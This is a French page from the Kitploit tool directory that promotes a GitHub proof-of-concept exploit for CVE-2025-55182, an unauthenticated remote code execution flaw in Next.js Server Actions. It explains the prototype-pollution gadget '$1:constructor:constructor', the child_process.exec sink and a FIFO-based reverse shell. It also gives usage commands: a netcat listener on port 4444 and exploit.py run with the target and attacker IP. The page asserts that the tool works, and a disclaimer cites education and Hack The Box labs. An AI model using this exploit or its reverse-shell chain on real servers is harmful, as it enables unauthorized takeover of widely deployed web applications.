Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-poc — Je sais que vous êtes probablement ici depuis Hack the Box, si c'est le cas, oui, celui-ci fonctionne réellement. | Kitploit
Outils/GitHubGitHub/uwugreed/cve-2025-55182-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubuwugreed/cve-2025-55182-poc

CVE-2025-55182-poc

Je sais que vous êtes probablement ici depuis Hack the Box, si c'est le cas, oui, celui-ci fonctionne réellement.

Voir le dépôt
il y a 7h 42mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182-poc

Une preuve de concept (PoC) pour CVE-2025-55182, ciblant une vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans les Server Actions de Next.js.

Cette preuve de concept exploite la pollution de prototype lors de la désérialisation de charges utiles multipart des React Server Components (RSC) afin d'injecter des commandes malveillantes dans le processus Node.js via un flux d'exécution asynchrone et non bloquant.


Fonctionnalités

  • Exécution asynchrone : Utilise child_process.exec() au lieu des API bloquantes execSync() pour éviter les blocages de threads sur les nœuds conteneurisés.
  • Livraison multi-shell robuste : Exploite une chaîne de reverse shell via un pipe FIFO conforme à POSIX pour une stabilité d'exécution maximale sur les moteurs de conteneurs Linux minimalistes.
  • Aucune dépendance externe : Entièrement construit avec la bibliothèque native requests de Python.

Utilisation

1. Configurez votre écouteur

Ouvrez un terminal sur votre hôte d'attaque et lancez un socket d'écoute netcat pour capturer la connexion inverse entrante :

root@kitploit:~
nc -lvnp 4444

2. Exécutez le script

Fournissez l'URL de base de la cible, l'adresse IP de votre interface hôte locale et le port de votre écouteur souhaité :

root@kitploit:~
python3 exploit.py <target_url> <your_ip> [your_port]

Exemple :

root@kitploit:~
python3 exploit.py http://website.whatever:port x.x.x.x 4444

Détails techniques

Le script envoie une charge utile multipart brute et spécialement conçue directement au point de terminaison de routage de l'application avec l'en-tête de routage Next-Action requis.

En exploitant les signatures de construction d'objets via {"get":"$1:constructor:constructor"}, le moteur de désérialisation pollue l'arborescence d'objets natifs. Lors du traitement des paramètres associés, il interprète le bloc de contexte _response intégré de manière malveillante comme une file d'instructions, permettant l'exécution de code sous les privilèges du contexte utilisateur du serveur Node en cours d'exécution.

root@kitploit:~
// Vecteur cible sous-jacent :
process.mainModule.require('child_process').exec('your_payload_here');

⚠️ Avertissement

Ce script est créé strictement à des fins éducatives, pour des tests de sécurité autorisés et pour capturer des drapeaux vulnérables sur des laboratoires tels que Hack The Box. L'auteur n'est pas responsable de toute utilisation abusive, intrusion non autorisée dans les systèmes ou dommages causés par cet outil.

Télécharger l’outil